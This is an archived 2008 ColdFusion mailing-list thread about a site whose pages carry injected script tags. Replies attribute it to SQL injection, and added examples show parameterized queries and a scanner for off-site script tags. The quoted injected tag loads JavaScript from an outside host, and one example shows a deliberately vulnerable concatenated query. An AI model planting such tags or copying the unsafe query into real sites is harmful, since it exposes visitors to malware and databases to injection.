RE: Script on one site

2008-09-03 Thread Scott Raley -ITC
Yes, we just had this happen and it was a SQL attack.

-Original Message-
From: Justin D. Scott [mailto:[EMAIL PROTECTED] 
Sent: Wednesday, September 03, 2008 12:01 AM
To: CF-Talk
Subject: RE: Script on one site

> Any ideas?

Probably a SQL injection attack.  See the previous discussion on this topic:

http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241


-Justin Scott




~|
Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to 
date
Get the Free Trial
http://ad.doubleclick.net/clk;203748912;27390454;j

Archive: 
http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:311974
Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm
Unsubscribe: 
http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4


Re: Script on one site

2008-09-03 Thread Al Musella, DPM
Look at the .cfm file and see if these script tags are in the cfm 
file or if they are stored in a database.
Look through your database. Look at every table and see if there is 
a lot of junk at the end of some char or varchar fields.

At 10:37 PM 9/2/2008, you wrote:


I have one site in particular that keeps getting this kind of stuff on
the bottom of .cfm pages right above the </body> tag.  I have already
recreated their FTP account once with a strong password. It seems odd
this is only happening to .cfm pages though and only on this site on the
server. Any ideas?

<script src=http://www.ncwc.ru/fgg.js></script><script
src=http://www.ncwc.ru/fgg.js></script><script



Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:311985


RE: Script on one site

2008-09-03 Thread webmaster
Yeah I did that already. It is in the .cfm files themselves. I also have
code in place to prevent SQL injection attacks. I'm hoping these were
files I just missed on the first cleanup. 


-Original Message-
From: Al Musella, DPM [mailto:[EMAIL PROTECTED] 
Sent: Wednesday, September 03, 2008 10:38 AM
To: CF-Talk
Subject: Re: Script on one site

Look at the .cfm file and see if these script tags are in the cfm 
file or if they are stored in a database.
Look through your database. Look at every table and see if there is 
a lot of junk at the end of some char or varchar fields.

At 10:37 PM 9/2/2008, you wrote:


I have one site in particular that keeps getting this kind of stuff on
the bottom of .cfm pages right above the </body> tag.  I have already
recreated their FTP account once with a strong password. It seems odd
this is only happening to .cfm pages though and only on this site on
the server. Any ideas?

<script src=http://www.ncwc.ru/fgg.js></script><script
src=http://www.ncwc.ru/fgg.js></script><script





Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:311990


Re: Script on one site

2008-09-02 Thread Azadi Saryev
you have become a victim of sql injection. there are huge threads on
this forum devoted to the recent spate of sqli attacks, with great
suggestions re fixing this.

the most important thing: make sure all your queries use cfqueryparam!

Azadi Saryev
Sabai-dee.com
http://www.sabai-dee.com/



[EMAIL PROTECTED] wrote:
> I have one site in particular that keeps getting this kind of stuff on
> the bottom of .cfm pages right above the </body> tag.  I have already
> recreated their FTP account once with a strong password. It seems odd
> this is only happening to .cfm pages though and only on this site on the
> server. Any ideas?
>
> <script src=http://www.ncwc.ru/fgg.js></script><script
> src=http://www.ncwc.ru/fgg.js></script><script
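
The cfqueryparam advice in the reply above, as an added example that is not part of the original thread: the same lookup with a request value concatenated into the SQL text, then with the value bound as a typed parameter. The datasource, table, column and URL parameter names are hypothetical.

```cfml
<!--- Added example; "siteDSN", the products table and the URL parameters
      are hypothetical names. --->

<!--- Weak: url.id becomes part of the SQL text, so anything appended to it
      is parsed by the database as SQL. --->
<cfquery name="getProduct" datasource="siteDSN">
    SELECT product_id, title, body
    FROM   products
    WHERE  product_id = #url.id#
</cfquery>

<!--- Corrected: the value is sent as a bound, typed parameter. A value that
      is not an integer fails validation and never reaches the database. --->
<cfparam name="url.id" default="0">
<cfquery name="getProduct" datasource="siteDSN">
    SELECT product_id, title, body
    FROM   products
    WHERE  product_id = <cfqueryparam value="#url.id#" cfsqltype="cf_sql_integer">
</cfquery>

<!--- Strings and lists are bound the same way. --->
<cfparam name="url.term" default="">
<cfparam name="url.cats" default="0">
<cfquery name="searchProducts" datasource="siteDSN">
    SELECT product_id, title
    FROM   products
    WHERE  title LIKE <cfqueryparam value="%#url.term#%" cfsqltype="cf_sql_varchar" maxlength="100">
    AND    category_id IN (<cfqueryparam value="#url.cats#" cfsqltype="cf_sql_integer" list="true">)
    ORDER BY
    <!--- Column names cannot be bound; pick them from fixed values instead. --->
    <cfif structKeyExists(url, "sort") and url.sort eq "title">title<cfelse>product_id</cfif>
</cfquery>
```

Every query that takes a form, URL, cookie or CGI value needs the same treatment; one unparameterized query is enough to leave the site exposed.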
 

RE: Script on one site

2008-09-02 Thread Justin D. Scott
> Any ideas?

Probably a SQL injection attack.  See the previous discussion on this topic:

http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241


-Justin Scott


Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:311971


Re: Script on one site

2008-09-02 Thread Brad Wood
Only if you are outputting a variable from the database at the bottom of 
your page right under your body tag.

You need to find out if the text is being output in a variable which has 
come from the database, or if it is actually in the .CFM files.

Even if you hardened your FTP password, your server could be infected with a 
virus that continues to modify your code.  There are actually tons of ways 
it *could* be happening.
Let's start by deciding where that text is actually stored.

~Brad

- Original Message - 
From: Justin D. Scott [EMAIL PROTECTED]
To: CF-Talk cf-talk@houseoffusion.com
Sent: Tuesday, September 02, 2008 11:00 PM
Subject: RE: Script on one site


> Any ideas?
>
> Probably a SQL injection attack.  See the previous discussion on this
> topic:

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:311972
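
One way to settle the question raised in the replies above (are the script tags in the .cfm files or coming from the database?), as an added example that is not part of the original thread: a ColdFusion page that walks the web root and lists every script tag in a .cfm file that loads from a host outside an allowlist. `webRoot` and `allowedHosts` are assumptions to be set for the affected site.

```cfml
<!--- Added example. webRoot and allowedHosts are assumptions; set them for
      the affected site and run this from an admin-only location. --->
<cfset webRoot = expandPath("/")>
<cfset allowedHosts = "www.example.com,static.example.com">
<!--- Matches <script ... src=http(s)://host...> with a quoted or unquoted
      src; subexpression 1 captures the host name. --->
<cfset tagPattern = "<script[^>]*[[:space:]]src[[:space:]]*=[[:space:]]*[""']?https?://([^/""'[:space:]>]+)">

<cfdirectory action="list" directory="#webRoot#" recurse="true"
             filter="*.cfm" name="pages">

<cfset findings = arrayNew(1)>
<cfloop query="pages">
    <cfif pages.type eq "File">
        <cfset path = pages.directory & "/" & pages.name>
        <cffile action="read" file="#path#" variable="source">
        <cfset pos = 1>
        <cfloop condition="pos lte len(source)">
            <cfset m = reFindNoCase(tagPattern, source, pos, true)>
            <cfif m.pos[1] eq 0><cfbreak></cfif>
            <cfset host = mid(source, m.pos[2], m.len[2])>
            <cfif not listFindNoCase(allowedHosts, host)>
                <cfset hit = structNew()>
                <cfset hit.file = path>
                <cfset hit.host = host>
                <cfset hit.offset = m.pos[1]>
                <cfset hit.modified = pages.dateLastModified>
                <cfset arrayAppend(findings, hit)>
            </cfif>
            <cfset pos = m.pos[1] + m.len[1]>
        </cfloop>
    </cfif>
</cfloop>

<cfoutput>
<p>#arrayLen(findings)# off-site script reference(s) found under #htmlEditFormat(webRoot)#</p>
<cfloop from="1" to="#arrayLen(findings)#" index="i">
    <!--- Encode before display: the host string comes from injected markup. --->
    #htmlEditFormat(findings[i].file)# | #htmlEditFormat(findings[i].host)# |
    offset #findings[i].offset# |
    modified #dateFormat(findings[i].modified, "yyyy-mm-dd")# #timeFormat(findings[i].modified, "HH:mm")#<br>
</cfloop>
</cfoutput>
```

Hits in the files themselves mean something is writing to disk, so the modification times are the window to compare against FTP and web server logs. No hits while the tags still show up in rendered pages points back at content stored in the database.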